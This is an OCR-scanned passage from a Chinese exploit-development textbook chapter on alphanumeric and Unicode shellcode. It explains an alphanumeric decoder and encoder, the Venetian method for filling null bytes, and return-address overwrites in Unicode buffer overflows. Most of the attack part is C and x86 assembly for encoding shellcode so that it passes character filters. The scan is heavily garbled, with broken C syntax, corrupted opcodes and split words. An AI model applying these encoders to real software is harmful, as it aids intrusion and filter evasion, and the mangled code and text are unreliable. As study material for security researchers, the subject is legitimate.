jb here 


这 显示 了 译 码 器 处 理 的 基本 循环 结构 。 经 过 编码 后 的 破解 应 该 只 使 用 了 R 到 P 的 字符 ， 所 以 ， 
我 们 可 以 用 8 或 更 大 的 字母 标记 编 过 码 的 破解 。EpI 指 向 要 译 码 的 缓冲 区 的 开头 ，EsT 同 样 指 向 要 
译 码 的 缓冲 区 的 开头 。 我 们 把 缓冲 区 的 第 一 个 字 节 移 到 Ar， 然 后 减 去 0x41， 左 移 4 位 ， 然 后 ar 加 
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上 缓冲 区 的 第 二 个 字 节 ， 再 减 去 0x41。 把 结果 写 入 ESI， 重 用 缓冲 区 。 持 续 循环 处 理 ， 直 到 磁 到 
比 P 大 的 字符 。 然 而 ， 这 个 译 码 器 本 身 有 许多 字 节 不 是 字母 、 数 字 ， 因 此 ， 我 们 需要 先 写 一 个 译 
码 器 编写 器 ， 生 成 译 码 器 ， 然 后 执行 它 。 

另 一 个 问题 是 ， 怎 样 把 EpI 和 ESsI 设 为 指向 正确 的 、 能 发 现 编 过 码 的、 破解 的 位 置 ? 很 好 ， 
我 们 只 需 在 译 码 器 之 前 用 下 列 代码 设置 寄存 器 : 


jmp B 
A: jmp C 
B: call A 
C: pop edi 
add edi,0Oxic 
push edi 
pop esi 


前 面 的 几 条 指令 得 到 当前 执行 点 (EIP-1) 的 地 址 , 弹出 到 EDI 寄 存 器 , 然后 ,， EDI 加 上 0xic。 
现在 ，EDI 指 向 译 码 器 结尾 处 的 jb 后 的 字 节 。 这 里 既是 我 们 编 过 码 的 破解 代码 开始 的 地 方 ， 也 是 
写 入 译 码 后 字 节 的 地 方 。 这 样 ， 当 循环 结束 时 ， 程 序 将 继续 执行 ， 直 接 进入 译 码 后 的 shellcode。 
返回 去 ， 把 EDI 复 制 到 Est。 我 们 将 把 ESI 作 为 译 码 后 的 破解 的 引用 点 。 一 旦 译 码 器 生成 的 字符 大 
于 Pp， 就 跳出 循环 ,继续 执行 译 码 后 的 破解 代码 。 现在 所 要 做 的 是 只 用 字母 、 数 字 字 符 写 一 个 “ 译 
码 器 编写 器 ”。 执 行 下 列 代码 ， 你 可 以 看 到 工作 中 的 译 码 器 编写 器 : 


#include <stdio.h> 


int main() 
{ 
char buffer[4001-"aaaaaaaaj0XA40HPZRXf5ASfS5UVfPhOzOOX5JEaBP" 
"YAAAABAQHCO00X5C7wvH4wPh00a0K52 7MgPhO " 
"OCCXf5A4wfPRXf5zzf5EefPh00MOX508aqgH4uPh0GO" 
"0X50ZgnH48PRX5000050M00PYAQXAaHHfPRX40" 
"A6PRX£f50z£50bPYAAAAAAfQRXfS5O0zf£500PYAAAfQ" 
"RX5555z5ZZZnPAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAEBEBEBEBEBE" 
"BEBEBEBEBEBEBEBEBEBEBEBEBEBEBOQQ'"; 
unsigned int x = 0; 
x - &buffer; 
. asmí 


mov esp,x 
jmp esp 

} 

return 0; 


} 
先 把 原始 的 破解 代码 编码 ， 然 后 添加 到 这 段 代 码 的 尾部 。 它 用 大 于 ?的 字符 做 界定 符 。 下 面 
是 编码 器 的 代码 : 


#include <stdio.h> 
#include <windows.h> 
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int main() 
t 


unsigned char 


RealShellcode[]="\x55\x8B\xXEC\x68\x30\x30\x30\x30\x58\x8B\xE5\x5D\xC3"; 
unsigned int count = 0, length-0, cnt-0; 
unsigned char *ptr - null; 
unsigned char a-0,b-0; 


length = strlen(RealShellcode); 
ptr = malloc((length + 1) * 2); 
if(iptr) 

return printf("malloc() failed.\n"); 
ZeroMemory (ptr, (length+1)*2); 
while(count < length) 

t 

- RealShellcode[count]; 


a = 
a = a >> 4; 
b= b << 4; 
b = b >> 4; 
a = a + 0x41; 
-b= b + 0x41; 
ptr[cnt++] = a; 
ptr[cnt++] = b; 
count ++; 


} 
strcat(ptr,"QQ"); 
free(ptr); 
return 0; 


} 
9.2 ”为 使 用 Unicode 的 过 滤器 写 破 解 代码 


Chris Anley 在 他 精彩 的 论文 Creating Arbitrary Shell Code in Unicode Expanded Strings 里 第 一 次 
提 到 了 破解 Unicode 漏 洞 的 可 行 性 。 论 文 发 表 于 2002 年 1 月 〈http:/wwwngssoftware.comy 
papers/unicodebo.pdf). 

这 篇 文章 介绍 了 用 实际 上 是 Unicode〔 严 格 地 说 是 UTF-16) 的 机 器 码 生 成 shellcode 的 方法 ， 
即 每 个 字符 的 第 二 个 字 节 是 空 值 。 尽 管 Chris 在 论文 里 对 如 何 使 用 这 个 技术 做 了 独特 的 介绍 ， 但 
他 提 到 的 代码 和 方法 还 有 一 定 的 局 限 性 , 他 本 人 在 文章 的 结尾 也 承认 了 这 些 局 限 性 ， 并 指出 可 以 
继续 改进 。 这 部 分 先 介绍 Chris 称 为 Venetian Method 的 方法 和 这 个 方法 的 实现 , 然后 查看 它 的 缺陷 ， 
并 仔细 讨论 改进 的 方法 。 - 
9.2.1 什么 是 Unicode 

在 讲解 之 前 ,我们 先 了 解 有 关 Unicode 的 基础 知识 。Unicode 是 用 16 位 编码 而 不 是 8 位 ， 嗯 ， 
实际 上 是 7 位 ， 比 如 说 ASCI) 表示 一 个 字符 的 标准 ,因而 支持 更 大 的 字符 集 , 使 它 成 为 国际 标准 。 
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支持 Unicode 标 准 的 操作 系统 因 易 于 使 用 而 得 到 广泛 接受 。 如 果 一 个 操作 系统 使 用 Unicode， 那 么 
这 个 操作 系统 的 代码 只 需 写 一 次 , 不 同 语言 的 使 用 者 只 需 改变 语言 和 字符 集 的 设置 即 可 ， 而 不 必 
重新 编译 整个 操作 系统 。 即 使 这 个 Unicode 系 统 使 用 Roman 字 符 集 ， 也 不 必 重 新 编译 整个 操作 系 
统 。 在 Roman 字 符 和 数字 里 ， 每 个 字符 的 ASCH 值 被 填充 一 个 空 字 节 后 形成 它 的 Unicode 形 式 。 例 
如 ，ASCII 字 符 a， 有 十 六 进 制 的 值 0x41， 用 Unicode 表 示 就 是 0x4100。 

String: ABCDEF 


Under ASCII: \x41\x42\x43\x44\x45\x46\x00 
Under Unicode: \x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x00\x00 


因此 ，Unicode 字 符 通 常 也 被 称 为 宽 字 符 ， 由 宽 字 符 组 成 的 字符 串 用 两 个 空 字 节 终止 。 然 而 ， 
非 ASCII 字 符 《〈 例 如 中 文 或 俄 文字 符 ) 没有 空 字 节 ， 因 为 所 有 的 16 位 都 被 使 用 了 。 在 Windows 操 
作 系 统 里 ， 正 常 的 ASCII 字 符 串 传 给 内 核 或 在 诸如 RPC 这 样 的 协议 里 使 用 时 ， 会 转换 成 等 价 的 


Unicode。 


9.2.2 J ASCII $£73 Unicode 


在 高 层 ， 大 部 分 程序 和 基于 文本 的 网 络 协议 〈 诸 如 HTTP) 能 处 理 正常 的 ASCI 字 符 串 。 这 
些 字符 串 随后 可 能 被 转换 成 等 价 的 Unicode， 以 至 于 低层 代码 和 服务 程序 能 处 理 它 们 。 

在 Windows 操 作 系统 中 ， 函 数 MultiByterowidechar() 把 ASCI 字 符 串 转换 为 等 价 的 宽 字 
符 。 相 反 ， WideCharToMultiByte () 函数 把 Unicode 字 符 串 转换 成 等 价 的 ASCII 字 符 串 。 传递 给 
这 两 个 函数 的 第 一 个 参数 是 代码 页 。 代 码 页 描述 了 应 该 使 用 的 字符 集 。 在 调用 MultiByte- 
ToWidechar() 时 ， 根 据 传 来 的 代码 页 ， 一 个 8 位 值 可 以 转换 成 完全 不 同 的 16 位 值 。 例 如 ， 当 用 
ANSI 代 码 页 (cP_AcP) 调用 这 个 转换 函数 时 ，8 位 值 0x8B 被 转换 成 宽 字 符 值 0x3920。 然 而 ， 如 
果 用 OEM 代 码 页 (cP_oEM)， 那 么 0x8B 将 被 转换 成 0xEF00。 

很 明显 ， 转 换 过 程 中 使 用 的 代码 页 对 发 送 给 Unicode 漏 洞 的 破解 代码 有 很 大 的 影响 。 然 而 ， 
超过 半数 的 ASCII 字 符 被 转换 成 宽 字 符 时 ， 只 是 简单 地 加 上 空 字 节 例如 有 代表 性 的 A Cox41) AE 
为 ox4100。 因 此 ， 当 为 基于 Unicode 的 缓冲 区 溢出 写 即 插 即 用 的 破解 时 ， 完 全 使 用 由 ASCII 字 符 
构成 的 代码 是 比较 妥当 的 。 这 样 一 来 ， 你 的 代码 就 不 大 会 被 转换 函数 搞 得 一 团 糟 了 。 


为 什么 存在 UNICODE 漏洞 





存在 Unicode 漏 洞 的 原因 和 存在 其 他 漏洞 的 原因 类 似 ， 正 像 人 人 都 知道 的 那样 ， 使 用 了 危 
险 的 函数 ， 如 strcpy() 和 strcat()， 两 者 都 适用 于 Unicode， 它 们 有 等 价 的 宽 字符 版 本 ， 如 
wscpy() 和 wscat() 。 的 确 ， 如 果 使 用 的 字符 串 长 度 被 算 错 或 误解 ， 甚 至 连 转 换 函 数 Multi- 
ByteToWideChar () ##wideCharToMultiByte() 都 会 受到 缓冲 区 溢出 的 影响 。 你 甚至 会 碰 到 
Unicode 格 式 化 串 漏 洞 。 


9.3 破解 Unicode 漏洞 


为 了 破解 Unicode 缓 冲 区 溢出 ， 我 们 需要 先 掌握 把 执行 进程 的 路 径 放 入 用 户 提交 的 缓冲 区 的 
技巧 。 根 据 每 个 漏洞 的 特性 ， 破 解 将 用 Unicode 改 写 保 存 的 返回 地 址 或 异常 处 理 程序 。 例 如 ， 如 
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果 在 0x00310004 处 发 现 缓冲 区 , 那 最 好 用 0x00310004 改 写 保存 的 返回 地 址 /异常 处 理 程序 。 如 果 
一 个 寄存 器 包含 了 用 户 提交 的 缓冲 区 地 址 〈 如 果 是 这 样 ， 你 就 太 幸 运 了 )， 你 或 许 能 在 Unicode 形 
式 的 地 址 附近 找到 “ 跳 转 寄存 器 ”或 “调用 寄存 器 ”的 操作 码 。 例 如 ， 如 果 EBX 寄 存 器 指向 用 户 
提交 的 缓冲 区 ， 那 么 ， 你 或 许 能 在 0x00770058 地 址 找到 jmp ebx 指令 。 如 果 你 的 运气 再 好 点 ， 
或 许 还 能 在 Unicode 格 式 的 地 址 处 找到 jmp 或 call ebx 指令 。 考 虑 下 列 代码 : 

0x007700FF inc ecx 


0x00770100 push ecx 
0x00770101 call ebx 


我 们 最 好 用 0x007700FF 改 写 保 存 的 返回 地 址 /异常 处 理 程序 ， 随 后 的 执行 代码 也 将 转 到 这 个 
地 址 。 当 从 这 里 继续 执行 时 ，EcX 递 增 1， 压 入 栈 ， 然 后 调用 EBX 指 向 的 地 址 。 那 么 用 户 提交 的 组 
冲 区 里 的 代码 将 继续 执行 。 这 只 有 百 万 分 之 一 的 可 能 ， 但 值得 我 们 记 住 。 如 果 在 cal1l/jmp 寄 存 
器 指令 之 前 的 代码 不 会 引起 访问 违例 ， 那 么 它 肯 定 可 用 。 

假如 你 发 现 返 回 到 用 户 提交 的 缓冲 区 的 方法 , 那么 接 下 来 ,你 需要 的 不 是 包含 缓冲 区 某 处 地 
址 的 寄存 器 ， 就 是 预先 知道 的 地 址 。Venetian Method 仓 促 创建 shellcode 时 使 用 了 这 个 地 址 。 后 文 
将 介绍 怎样 在 缓冲 区 上 找到 这 个 地 址 。 

Unicode 破解 代码 里 可 用 的 指令 

破解 Unicode 漏 润 时 ， 被 执行 的 代码 必须 是 这 种 形式 :每 个 字符 的 第 二 个 字 节 是 空 值 ， 其 他 
的 是 非 空 值 。 很 明显 ， 这 将 限制 你 只 能 使 用 有 限 的 指令 。 对 Unicode 破解 开发 者 来 说 ， 可 以 使 用 
的 指令 是 那些 单字 节操 作 指 令 ， 包 括 push、pop、inc 和 dec， 也 可 以 是 如 下 形式 的 指令 : 


nnOOnn 
例如 ;: 
mul eax, dword ptrfeax],0x00nn 
作为 备 选 的 还 有 以 下 指令 : 
nnOOnnOOnn 
例如 : 
imul eax, dword Ptr[eax], 0x00nn00nDn 
或 者 更 多 如 下 形式 的 加 法 指令 : 
00nn00 
在 这 里 ， 两 个 单字 节 指 令 被 相继 使 用 ， 如 下 面 的 代码 段 : 
00401066 50 push eax 
00401067 59 pop ecx 
这 个 指令 必须 用 00 nn 00 形 式 的 等 价 nop 分 开 ， 使 它 成 为 真正 的 Unicode。 例 如 : 
00401067 00 6D 00 add byte ptr [ebp],ch 


当然 ， 要 想 成 功 地 使 用 这 个 方法 ，EBP 指 向 的 地 址 必须 是 可 写 的 。 如 果 不 符合 这 个 要 求 ， 只 
有 另 想 办 法 了 ， 本 节 后 面 列 了 很 多 方法 。 当 把 这 样 的 指令 嵌 到 push 和 pop 之 间 时 ， 得 到 : 
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00401066 50 push eax 

00401067 00 6D 00 add byte ptr [ebpl,ch 
0040106A 59 pop ecx 

也 就 是 如 下 形式 的 Unicode: 

\x50\x00\x6D\x00\x59 


94 百叶窗 法 


毫 不 夸张 地 说 ,用 如 此 有 限 的 指令 集 写 多 功能 的 破解 代码 是 非常 困难 的 。 那么 ,我们 能 做 何 
改进 昵 ? 你 可 以 用 这 个 有 限 的 指令 集 迅 速 创建 一 个 真正 的 破解 代码 ， 就 像 Chris Anley 论 文 里 描述 
的 百叶 窗 方 法 那样 。 这 个 方法 基本 上 需要 一 个 使 用 “破解 编写 器 ”的 破解 ， 以 及 一 个 已 经 有 一 半 
真正 破解 代码 在 里 面 的 缓冲 区 。 这 个 缓冲 区 是 真正 破解 代码 最 终 扩 展 的 目的 地 。 仅 用 有 限 的 指令 
集 编写 的 破解 编写 器 使 用 创建 全 攻 能 破解 代码 所 需 的 代码 取代 了 目的 缓冲 区 里 的 每 个 空 字 节 。 

看 一 个 例子 。 在 破解 编写 器 开始 执行 前 ， 目 的 缓冲 区 是 : 

\x41\x00\x43\x00\x45\x00\x47\x00 

当 破 解 编 写 器 开始 工作 时 ， 它 用 0x42 蔡 换 第 一 个 空 字 节 ， 得 到 

\x41\x42\x43\x00\x45\x00\x47\x00 

接着 ， 下 一 个 空 字 节 被 0x44 蔡 换 ， 得 到 

\X41\x42\x43\x00\x45\x00\x47\x00 

重复 这 个 过 程 直到 “真正 的 ”全 功能 破解 最 终 呈 现 。 

\x41\x42\x43\x44\x45\x46\x47\x48 

可 见 ， 它 非常 像 合 上 的 百叶 窗 ， 所 以 这 个 方法 被 称 为 百叶 窗 法 。 

为 把 每 个 空 字 节 设 为 适当 的 值 , 破解 编写 器 在 开始 工作 时 , 至 少 需要 一 个 指向 半 填 充 缓冲 区 
的 第 一 个 空 字 节 的 寄存 器 。 假 设 ERx 指 向 第 一 个 空 字 节 ， 它 可 以 用 如 下 指令 来 设置 : 

00401066 80 00 42 add byte ptr [eax] ,42h 

0x42 加 上 0x00， 很 明显 ， 得 到 ox42。 为 了 指向 下 一 个 空 字 节 ，ERX 必 须 被 递增 两 次 ， 因 而 
它 也 能 被 填充 。 但 是 记 住 ， 这 个 破解 编写 器 的 一 部 分 破解 代码 需要 真正 的 Unicode， 因 此 ， 它 应 
该 用 等 价 的 nop 填 充 。 为 了 写 1B 的 破解 代码 ， 现 在 需要 下 列 代码 : 


00401066 80 00 42 add byte ptr [eax],42h 
00401069 00 6D 00 add byte ptr [ebp],ch 

0040106C 40 inc eax 

0040106D 00 6D 00 add byte ptr [ebp],ch 

00401070 40 inc eax 

00401071 00 6D 00 add byte ptr [ebp],ch 


为 了 得 到 2B 真 正 的 破解 代码 ， 我 们 用 了 16B 〈8 个 宽 字 符 )， 其 中 14B (7 个 宽 字 符 ) 是 指 
令 ，2B (1 个 宽 字 符 〉 用 于 存储 。1B 已 经 在 目的 缓冲 区 里 了 ， 另 外 1B 由 破解 编写 器 在 运行 过 
程 中 创建 。 

Chris 的 代码 比较 小 〈 相 对 来 说 )， 这 是 一 个 优点 ， 但 也 存在 一 个 问题 : 代码 中 有 0x80。 如 果 
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把 破解 代码 作为 ASCIHI 字 符 串 发 给 脆弱 的 进程 ,进程 上 可 能 把 它 转换 成 Unicode, 根据 转换 函数 使 
用 的 代码 页 , 这 个 字 节 有 可 能 被 破坏 。 此 外 , 用 大 于 0x7F 的 值 替 换 空 字 节 时 , 会 面临 同样 的 问题 ， 
破解 代码 有 可 能 会 被 破坏 ， 从 而 不 能 正常 工作 。 为 了 解决 这 个 问题 ， 我 们 需要 创建 只 使 用 0x20 
到 0x7F 之 间 字 节 的 破解 编写 器 。 更 好 的 解决 办 法 是 只 使 用 字母 和 数字 ， 因 为 即使 是 标点 符号 ， 有 
时 也 会 受到 特殊 处 理 ， 如 经 常 被 剥离 、 转 义 或 转换 。 为 了 保证 成 功 ， 我们 应 尽量 避免 使 用 这 些 容 
易 出 问题 的 字符 。 


ASCII 百叶窗 方法 实现 

我 们 的 任务 是 编写 使 用 百叶 窗 方法 的 Unicode 类 型 破解 代码 ， 如 果 你 愿意 ， 可 以 在 运行 过 程 
中 只 用 Roman 字 母 表 (Roman 破 解 代 码 编写 器 ) 中 的 ASCII 字 母 和 数字 生成 任意 的 代码 。 还 有 其 
他 一 些 生成 代码 的 方法 ， 但 效率 都 很 低 ， 它 们 用 多 个 字 节 表示 一 个 shellcode 字 节 。 这 里 介绍 的 
方法 符合 我 们 的 需要 ， 用 百叶 窗 方法 呈现 原始 代码 的 ASCII 形 式 ， 可 使 用 最 少 的 字 节 数 。 在 接触 
破解 编写 器 实质 之 前 , 需要 先 设置 一 些 状态 。 我 们 需要 把 Ecx 设 为 指向 目的 缓冲 区 的 第 一 个 空 字 
节 ， 还 需要 把 值 0x01 放 在 栈 顶 ， 把 0x39 放 在 EDx( 实 际 上 在 DL) 里 ， 把 0x69 放 在 EBX( 实 际 上 
EBL) 里 。 如 果 你 不 清楚 这 些 先决 条 件 从 何 而 来 ， 不 必 担 心 ， 一 切 都 将 真相 大 白 。 为 了 看 得 清 
楚 一 些 ， 我 们 把 那些 等 价 的 nop (这 里 是 指 adq byte ptr [ebpl,ch) 从 下 面 的 设置 代码 里 


BET: 

0040B55E 6A 00 push 0 

0040B560 5B pop ebx 

0040B564 43 inc ebx 

0040B568 53 push ebx 

0040B56C 54 push esp 

00408570 58 pop eax 

0040B574 6B 00 39 imul eax,dword ptr [eax],39h 
0040B57A 50 push eax 

0040B57E 5A pop edx 

0040B582 54 push esp 

0040B586 58 pop eax 

0040B58A 6B 00 69 imul eax,dword ptr [eax],69h 
00408590 50 push eax 

0040B594 5B pop ebx 


假设 Ecx 包 含 了 指向 第 一 个 空 字 节 CRAB OL) 的 指针 ， 这 段 代 码 已 经 把 
0x00000000 压 入 栈 顶 ， 然 后 弹出 到 EBX。EBX 现 在 的 值 为 0。EBX 加 1 后 被 压 入 栈 。 接 下 来 ， 我 们 
把 栈 顶 的 地 址 压 入 栈 顶 ， 然 后 弹出 到 Eax， 现 在 ERax 中 保存 的 是 1 的 内 存 地址 。 现 在 用 0x39 乘 1 得 
到 0x39， 这 个 结果 保存 在 ERX， 然 后 压 入 栈 ， 接 着 弹出 到 EDX。EDX 现 在 是 0x39， 更 重要 的 是 ， 
EDX 的 低 8 位 寄存 器 DL 的 值 是 0x39。 

用 push esp 指 令 再 次 把 1 的 地 址 压 入 栈 顶 ， 然 后 弹出 到 EAX。EAX 又 保存 了 1 的 内 存 地 址 。 用 
0x69 乘 1， 这 个 结果 保存 在 EAX 里 ， 然 后 压 入 栈 ， 弹 出 到 EBX。BEBX/BL 现 在 的 值 是 0x69。 当 需要 
写 大 于 0x7F 的 字 节 时 ，BL 和 DL 将 开始 起 作用 。 继 续 看 百叶 窗 方法 的 实现 形式 ， 为 了 使 版 面 看 起 
来 比较 整洁 ， 我 们 移 走 了 等 价 的 nop， 如 下 : 
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0040B5BA 
0040B5BE 
0040B5C2 
0040B5C5 
0040B5C8 
0040B5CC 


54 
58 
6B 00 41 
00 41 00 
41 
41 


esp 
eax 

eax,dword ptr [eax],41h 
byte ptr [ecx],al 

ecx 

ecx 


记 住 ， 栈 顶 保存 的 值 是 0x00000001， 我 们 把 1 的 地 址 压 入 栈 ， 然 后 弹出 到 EAX， 因 此 ，EAX 
现在 保存 的 是 1 的 地 址 。 用 imul 指 令 把 我 们 想 写 的 值 乘 以 1， 在 这 种 情况 下 是 0x41。EAX 现 在 是 
0x00000041， 所 以 aL 是 0x41。 我 们 把 它 与 Ecx 指 向 的 字 节 相 加 ( 记 住 ， 是 空 字 节 ， 因 此 ， 当 0x41 
加 上 0x00 时 ， 得 到 0x41)， 关 闭 了 百叶 窗 的 第 一 个 挡 板 。 然 后 ECX 递增 两 次 ， 跳 过 非 空 字 节 ， 使 
ECX 指 向 下 一 个 空 字 节 ， 重 复 这 个 过 程 ， 直 到 写 出 整个 代码 。 

现在 ， 如 果 和 需要 写 一 个 大 于 0x7F 的 值 ， 会 发 生 什么 呢 ? 我 们 希望 BL 和 DL 在 这 里 发 挥 作 用 。 
下 列 所 述 是 如 上 代码 为 了 处 理 这 样 的 情况 所 做 的 一 些 变化 。 

假设 用 0x7F 到 0xAF 之 间 的 字 节 替换 正在 讨论 的 空 字 节 ， 例 如 0x94 (xchg eax,esp)， 应 该 


用 下 列 代码 ; 


0040B5BA 
0040B5BE 
0040B5C2 
0040B5C5 
0040B5C8 
0040B5C9 
0040B5CC 
0040B5D0 


54 
58 
6B 00 5B 
00 41 00 
46 
00 51 00 
41 
41 


push 
pop 
imul 
add 
ine 
add 
inc 
inc 


esp 
eax 

eax,dword ptr [eax],5Bh 

byte ptr [ecx],al 

esi 

byte ptr [ecx],dl // «---- HERE 
ecx 

ecx 


注意 这 里 会 发 生 什 么 。 先 把 0x5B 写 入 空 字 节 ， 然 后 加 上 DL 里 的 值 0x39。0x39 加 上 0x5B 等 于 
0x94。 顺 便 提 一 下 ， 用 INc ESI 代 替 插 入 等 价 的 nop， 和 避免 Ecx 因 过 早 递增 而 使 0x39 加 上 一 个 非 


空 字 节 。 


如 果 用 0xaF 到 0xFF 之 间 的 值 奉 换 空 字 节 ， 例 如 0xc3 (ret), TAFIA: 


0040B5BA 
0040B5BE 
0040B5C2 
0040B5C5 
0040B5C8 
0040B5C9 
0040B5CC 
0040B5D0 


54 
58 
6B 00 5A 
00 41 00 
46 
00 59 00 
41 
41 


push 
pop 
imul 
add 
inc 
add 
ine 
ine 


esp 
eax 

eax,dword ptr [eax],5Ah 

byte ptr [ecx],al 

esi 

byte ptr [ecx],bl // «---- HERE 
ecx 

ecx 


在 这 个 例子 里 ， 我 们 做 同样 的 事情 ， 只 不 过 这 次 是 利用 BL 把 0x69 与 这 个 字 节 所 指 的 地 址 相 
加 。 这 由 Ecx 完 成 ，ECX 恰 好 被 设 为 0x5&A。0x5&A 加 上 0x69 等 于 0xc3， 所 以 ， 我 们 写 出 了 ret 指 令 。 

如 果 需 要 的 值 在 0x00 到 0x20 之 间 ， 会 发 生 什 么 昵 ? 在 这 种 情况 下 ， 只 需 简 单 地 溢出 这 个 字 
节 即 可 。 假 如 想 用 0x06 替 换 空 字 节 (push es)， 最 好 用 这 样 的 代码 : 


0040B5BA 
0040B5BE 
0040B5C2 


54 
58 
6B 00 64 


push 
pop 
imul 


esp 
eax 
eax,dword ptr [eax] ,64h 
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0040B5C5 00 41 00 add byte ptr [ecx],al 
0040B5C8 46 inc esi 

0040B5C9 00 59 00 add byte ptr [ecx],bl 
// «--- BL == 0x69 

0040B5CC 46 inc esi 

0040B5CD 00 51 00 add byte ptr [ecx],dl 
// «--- DL -- 0x39 

0040B5DO 41 inc ecx 

0040B5D4 41 inc ecx 


0x60 加 上 0x69 再 加 上 0x39 等 于 0x106。 但 一 个 字 节 可 以 保存 的 最 大 值 是 0xFF， 因 此 ， 这 个 
字 节 产生 溢出 ， 从 而 只 剩 下 0x06。 

当 它 们 不 在 0x20 到 0x7F 范 围 内 时 , 也 可 以 用 这 个 方法 调整 非 空 字 节 , 而 且 可 以 用 等 价 的 non 
做 些 有 用 的 事情 一 一 让 我 们 用 这 个 方法 使 它 非 等 价 。 例 如 ， 假 设 非 空 字 节 是 0xc3 (ret)， 最 初 
应 把 它 设 为 0x5A。 当 在 非 空 字 节 之 前 设置 空 字 节 时 ， 我 们 要 确保 在 调用 第 二 个 inc ecx 之 前 做 这 
些 。 可 以 做 如 下 调整 : 


0040B5BA 54 push esp 

0040B5BE 58 pop eax 

0040B5C2 6B 00 41 imal eax,dword ptr [eax], 4ih 
0040B5C5 00 41 00 add byte ptr [ecx],al 
0040B5C8 41 inc ecx 

// NOW ECX POINTS TO THE 0Ox5A IN THE DESTINATION BUFFER 

0040B5C9 00 59 00 add byte ptr [ecx],bl 

// «-- BL == 0x69 NON-null BYTE NOW EQUALS 0xc3 

0040B5CC 41 inc ecx 

0040B5CD 00 6D 00 add byte ptr [ebp],ch 


重复 这 个 动作 直到 完成 整个 代码 。 但 有 一 个 遗留 的 问题 : 我 们 到 底 想 执行 什么 样 的 代码 呢 ? 
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\x41\x00\x43\x00\x45\x00\x47\x00\x48\x00\x46\x00\x44\x00\x42\x00 

于 是 ， 我 们 写 自己 的 widecharToMultiByte() 译 码 器 ， 从 尾部 拿 走 \x42， 把 它 放 在 \x41 后 
i. 然后， 复制 \x44 到 \x43 后 面 ， 等 等 ， 直 到 结束 。 

\x41\x00\x43\x00\x45\x00\x47\x00\x48\x00\x46\x00\x44\x00\x42\x00 


移动 \x42。 


\x41\x42\x43\x00\x45\x00\x47\x00\x48\x00\x46\x00\x44\x00\x42\x00 


移动 \x44。 


\x41\x42\x43\x44\x45\x00\x47\x00\x48\x00\x46\x00\x44\x00\x42\x00 


移动 \x46。 


\x41\x*42\x43\x44\x45\x46\x47\x00\x48\x00\x46\x00\x44\x00\x42\x00 


移动 \x48。 


\X41\x42\x43\x44\x45\x46\x47\x48\x48\x00\x46\x00\x44\x00\x42\x00 


这 样 就 完成 了 Unicode 字 符 串 的 译 码 ， 得 到 了 想 要 的 执行 代码 了 。 


9.5.1 译 码 器 的 代码 


应 该 把 这 个 译 码 器 写成 自 包 含 模块 , 做 到 即 插 即 用 。 这 个 译 码 器 所 做 的 唯一 假定 是 在 入 口 处 
EDI 寄 存 器 保存 的 是 将 要 被 执行 的 第 一 条 指令 的 地 址 (在 这 种 情况 下 是 0x004010B4)。 译 码 器 的 
长 度 是 0x23 字 节 ， 它 被 加 到 EDI， 因 此 EDI 现 在 恰好 指向 jne here 指 令 的 后 面 。 这 是 Unicode 字 符 


串 将 被 译 码 的 地 方 。 
004010B4 83 C7 23 add edi,23h 
004010B7 33 CO xor eax,eax 
004010B9 33 C9 xor ecx,ecx 
004010BB F7 D1 not ecx 
004010BD F2 66 AF repne scas word ptr [edi] 
004010C0 F7 D1 not ecx 
004010C2 D1 El shl ecx, 1 
004010C4 2B F9 sub edi,ecx 
004010C6 83 E9 04 sub ecx,4 
004010C9 47 inc edi 
here: 
004010CA 49 dec ecx 
004010CB 8A 14 OF mov dl,dword ptr [edi+ecx] 
004010CE 88 17 mov byte ptr [edi],dl 
004010D0 47 inc edi 
004010D1 47 inc edi 
004010D2 49 dec ecx 
004010D3 49 dec ecx 
004010D4 49 dec ecx 


004010D5 75 F3 jne here (004010ca) 
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在 对 Unicode 字 符 串 译 码 之 前 ， 译 码 器 需要 知道 将 要 译 码 的 字符 串 的 长 度 。 如 果 这 个 代码 能 
做 到 即 插 即 用 ， 那 么 这 个 字符 串 可 以 是 任意 长 度 。 为 了 得 到 字符 串 的 长 度 ， 这 段 代 码 将 扫描 整 
个 字符 串 来 寻找 两 个 连续 的 空 字 节 ， 记 住 ， 两 个 空 字 节 将 终止 Unicode 字 符 串 。 译 码 器 开始 循环 
时 ， 在 标注 here 的 地 方 ，ECX 包 含 字 符 串 的 长 度 ，EDI 指 向 字符 串 的 开头 。 然 后 ，EDI 递 增 1， 
指向 第 一 个 空 字 节 ，BECX 递 减 1。 现 在 ， 当 EcX 被 加 到 BDI 时 ， 将 指向 字符 串 末 端的 非 空 字 节 。 然 
后 ， 这 个 非 空 字 节 被 临时 移 到 pDL， 然 后 移 到 EDI 指 向 的 空 字 节 。BEDI 递 增 2，ECX 递 减 4， 继 续 执 
行 循环 。 

当 EDI 指 向 字符 串 中 部 的 时 候 ，EcXx 是 0，Unicode 字 符 串 尾部 的 非 空 字 节 都 被 移 到 字符 串 的 
前 半 部 ， 蔡 换 了 空 字 节 ， 因 此 ， 我 们 有 了 一 块 连续 的 代码 。 当 循环 结束 时 ， 程 序 从 刚 译 码 的 破解 
代码 头 部 继续 执行 ， 这 个 破解 代码 位 于 jne here 指 令 之 后 刚刚 被 解码 的 。 

在 实际 写 Roman 破 解 编写 器 之 前 , 还 有 一 些 事情 需要 处 理 。 我 们 需要 一 个 指向 缓冲 区 的 指针 ， 
译 码 器 将 被 写 到 那里 ， 一 旦 写 完 这 个 译 码 器 ， 还 需要 调整 这 个 指针 ， 使 它 指向 译 码 器 即将 开始 工 
作 的 缓冲 区 。 


9.5.2 ”在 缓冲 区 地 址 上 定位 

返回 刚 得 到 控制 的 脆弱 进程 , 在 做 进一步 处 理 之 前 , 需要 获得 用 户 提交 数据 的 缓冲 区 的 参考 。 
我 们 将 用 到 百叶 窗 方 法 中 使 用 ECzx 的 代码 ， 因 此 ， 需 要 把 Ecx 设 为 指向 缓冲 区 。 两 个 方法 都 可 以 
使 用 , 主要 看 寄存 器 是 否 指向 缓冲 区 。 最 后 , 假设 一 个 寄存 器 包含 一 个 指向 缓冲 区 的 指针 (例如 ， 
EAX 寄 存 器 )， 我 们 最 好 把 它 压 入 栈 ， 然 后 弹出 到 ECx。 


push eax 
pop ecx 


然而 ， 如 果 没 有 寄存 器 指向 缓冲 区 ， 可 是 知道 缓冲 区 在 内 存 中 的 精确 位 置 ， 那 么 也 可 以 用 下 
列 技术 。 很 多 时 候 ， 我 们 用 固定 位 置 〈 的 地 址 ) 改写 返回 地 址 ， 例 如 ox00410041， 然 后 得 到 所 
需 信息 。 


push 0 

pop eax 

push eax 

push esp 

